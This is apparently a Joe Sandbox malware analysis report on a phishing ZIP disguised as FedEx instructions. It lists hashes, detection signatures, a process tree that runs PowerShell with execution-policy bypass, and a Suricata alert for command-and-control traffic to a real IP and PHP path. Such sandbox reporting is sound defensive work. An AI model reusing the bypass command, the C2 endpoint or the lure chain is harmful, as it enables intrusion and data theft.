Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VertusinstruccionesFedEX_66521.zip

Overview

General Information

Sample name:VertusinstruccionesFedEX_66521.zip
Analysis ID:1542320
MD5:f76879ad44a025bd87fa9951f125a3b8
SHA1:273d89047f6d6af1c5188961105ae5e19f196eaf
SHA256:f61dd9278bc465eb881e220a47152e0b731c909c2d7e3b9e8e7725177a8ee32c
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Sigma detected: Suspicious PowerShell Parameter Substring
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 1236 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cmd.exe (PID: 604 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\VertusinstruccionesFedEX_NHJzl5uIzstD.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3392 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo %PCzmjQH8jota% " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 1464 cmdline: cmd.exe /c powershell.exe -exec bypass -nop -win 1 - MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5056 cmdline: powershell.exe -exec bypass -nop -win 1 - MD5: 04029E121A0CFA5991749937DD22A1D9)
  • OpenWith.exe (PID: 2240 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • OpenWith.exe (PID: 3628 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
    • notepad.exe (PID: 1256 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\- MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
amsi64_5056.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -exec bypass -nop -win 1 -, CommandLine: powershell.exe -exec bypass -nop -win 1 -, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe -exec bypass -nop -win 1 -, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1464, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -exec bypass -nop -win 1 -, ProcessId: 5056, ProcessName: powershell.exe
    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -exec bypass -nop -win 1 -, CommandLine: powershell.exe -exec bypass -nop -win 1 -, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe -exec bypass -nop -win 1 -, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1464, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -exec bypass -nop -win 1 -, ProcessId: 5056, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -exec bypass -nop -win 1 -, CommandLine: powershell.exe -exec bypass -nop -win 1 -, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe -exec bypass -nop -win 1 -, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1464, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -exec bypass -nop -win 1 -, ProcessId: 5056, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-25T19:35:16.976472+020020559031Malware Command and Control Activity Detected192.168.2.174970845.79.204.1298901TCP

    Click to jump to signature section

    Show All Signature Results

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2055903 - Severity 1 - ET MALWARE PS1/ExfiltracaoBot CnC Checkin : 192.168.2.17:49708 -> 45.79.204.129:8901
    Source: global trafficTCP traffic: 192.168.2.17:49708 -> 45.79.204.129:8901
    Source: global trafficHTTP traffic detected: GET /contadores/TnZYN.php?iWY=EiwIZKlgmDJwbFobKM167awreInvomxL806TXsZdJznxUFO HTTP/1.1Host: 45.79.204.129Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
    Source: unknownDNS query: name: ipinfo.io
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownTCP traffic detected without corresponding DNS query: 45.79.204.129
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /contadores/TnZYN.php?iWY=EiwIZKlgmDJwbFobKM167awreInvomxL806TXsZdJznxUFO HTTP/1.1Host: 45.79.204.129Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://ocsp.digicert.com0C
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://ocsp.digicert.com0N
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://ocsp.digicert.com0O
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: http://www.digicert.com/CPS0
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000017.00000002.2457942413.000001D9374B2000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000017.00000002.2458476900.000001D9375B2000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: https://mozilla.org0
    Source: notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, -String found in binary or memory: https://www.digicert.com/CPS0
    Source: classification engineClassification label: mal60.evad.winZIP@13/4@1/2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\2510Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2240:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_03
    Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnegbpwh.sso.ps1Jump to behavior
    Source: C:\Windows\System32\OpenWith.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\VertusinstruccionesFedEX_NHJzl5uIzstD.cmd" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %PCzmjQH8jota% "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe -exec bypass -nop -win 1 -
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -exec bypass -nop -win 1 -
    Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
    Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
    Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\-
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %PCzmjQH8jota% "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe -exec bypass -nop -win 1 -Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -exec bypass -nop -win 1 -Jump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\-Jump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
